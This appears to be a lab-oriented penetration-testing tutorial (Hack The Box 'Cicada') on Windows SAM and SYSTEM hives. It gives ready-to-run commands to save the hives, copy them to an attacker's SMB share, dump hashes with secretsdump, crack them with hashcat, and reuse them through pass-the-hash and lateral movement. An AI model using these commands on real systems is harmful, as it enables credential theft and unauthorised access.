SAM and SYSTEM files

Cicada HTB

The Security Account Manager (SAM) is a database file in Windows that stores the credentials of local user accounts: the NT hash (commonly called the NTLM hash) of each password and, on old systems or where LM storage has not been disabled, the LM hash as well. These hashes live in a protected registry hive and are used to authenticate users on the system. The hash data inside the hive is itself encrypted with a key derived from the boot key, which is stored in the SYSTEM hive, so the SAM alone is not enough to recover them.

SAM Operation Modes:

  • Online Mode - reading HKLM\SAM on the running system; requires SYSTEM privileges (or a SYSTEM token), because the hive's ACL denies even administrators direct access

  • Offline Mode - parsing saved copies of the hives; requires both the SAM and SYSTEM hives (exported with reg save or taken from backup files), since the SYSTEM hive holds the boot key needed to decrypt the hashes

Location of the SAM file:

%SystemRoot%\System32\config\SAM

It is mounted in the registry as HKLM\SAM. While Windows is running the file is held open by the kernel and cannot simply be copied, which is why reg save (or a volume shadow copy) is used to obtain a copy.


Common Locations of SAM and SYSTEM files

%SystemRoot%\repair\SAM
%SystemRoot%\System32\config\RegBack\SAM
%SystemRoot%\System32\config\SAM
%SystemRoot%\repair\system
%SystemRoot%\System32\config\SYSTEM
%SystemRoot%\System32\config\RegBack\SYSTEM

Note: %SystemRoot% is usually C:\Windows. The repair\ copies are a legacy location from older Windows versions (XP/2003 era) and may not exist. Since Windows 10 version 1803 the RegBack\ folder is no longer populated by default (its files are 0 bytes unless periodic registry backup has been re-enabled), so check the file sizes before transferring them.


Extracting Windows Password Hashes

Step 1: Save SAM, SYSTEM and SECURITY Hives

Use the reg save command from an elevated (administrator) prompt to export the registry hives. SECURITY is included because secretsdump can also recover LSA secrets and cached domain credentials from it:

mkdir c:\pass
reg save hklm\sam C:\pass\sam
reg save hklm\system C:\pass\system
reg save hklm\security C:\pass\security

Step 2: Transfer Files to Attacker Machine

Start an SMB server on the attacker machine using Impacket (SMB2 support is needed for modern Windows hosts, which have SMB1 disabled):

python smbserver.py public /home/Public

Alternate, with SMB2 support and credentials (on current Impacket installs the script is also available as impacket-smbserver):

impacket-smbserver -smb2support -user user -password 12345 share /opt/share

Copy the files over the network from the Windows host. If the share was started with -user/-password, map it first with net use, supplying the same username and password:

copy sam \\192.168.29.218\Public\
copy system \\192.168.29.218\Public\

Alternative: if you already have a WinRM shell, evil-winrm's built-in download command can pull the saved hives without an SMB server:

evil-winrm -u Administrator -p Devnull@123 -i 192.168.29.21

Step 3: Clone and install Impacket (skip this if your distribution already ships the impacket-* tools)

git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
pip install .

The repository now lives under the fortra organisation on GitHub; the SecureAuthCorp URL redirects there.

Step 4: Extract Password Hashes with secretsdump

impacket-secretsdump -sam sam -security security -system system LOCAL

Step 5: Save the NT hash to a file

secretsdump prints one line per account in the format user:RID:LM hash:NT hash:::. The NT hash is the fourth colon-separated field; put that value (not the whole line) into hash.txt:

echo <NT hash> > hash.txt

Accounts whose NT hash is 31d6cfe0d16ae931b73c59d7e0c089c0 have an empty password (typically disabled built-in accounts such as Guest) and are not worth cracking.

Step 6: Crack the NT hash with hashcat (-m 1000 is hashcat's NTLM mode, i.e. the NT hash)

hashcat -m 1000 -a 0 hash.txt /usr/share/wordlists/rockyou.txt -o hash.out.txt

Cracked results are also kept in hashcat's potfile and can be printed again later with the --show option.

Dumping Remote Hashes using secretsdump

If you already have administrator credentials for the target, secretsdump can dump the hashes remotely without saving and transferring the hives:

impacket-secretsdump <domain>/<username>:<password>@<target_IP>

The first part is the domain (or workgroup) name, not the hostname, and it can be omitted for a local account. With the -hashes option (LMHASH:NTHASH) in place of the password, the same command works with a hash obtained earlier (pass-the-hash).


Extracting BootKey from SYSTEM Hive

bkhive extracts the boot key (syskey) with which the SAM's hash data is encrypted. secretsdump performs this step itself (it prints the key as "Target system bootKey"), so a separate extraction is only needed with older tooling such as samdump2:

bkhive system bootkey.txt

Note: bkhive is deprecated and no longer shipped by most distributions; current samdump2 versions take the SYSTEM and SAM hives as their two arguments and derive the boot key themselves, so no separate boot key file is needed.

Tips and Best Practices

  • Do not change users' passwords; the hashes themselves can be reused (pass-the-hash), and a password change is noisy and disruptive

  • Dumping the SAM only works with local administrator (SYSTEM-level) privileges

  • Generally used for lateral movement: a local hash is often valid on other machines (password reuse or a shared local administrator password) and can be used to reach a different machine or account

  • The SAM is the database of local (non-AD) accounts on a single PC; domain account hashes are stored in NTDS.dit on the domain controllers instead
